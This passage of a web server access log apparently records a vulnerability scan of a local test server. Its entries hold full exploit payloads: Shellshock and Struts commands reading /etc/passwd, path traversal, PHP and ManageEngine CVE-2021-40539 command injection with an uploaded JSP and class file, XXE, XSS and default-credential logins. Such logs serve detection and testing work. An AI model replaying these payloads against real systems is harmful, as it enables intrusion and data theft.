filename=\x2229KD1yhMJ9RSMgq1b0C28zblTNk.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KD1yM729iR3WWvOEHOnPpCvZC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22logfile\x22; filename=\x22\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 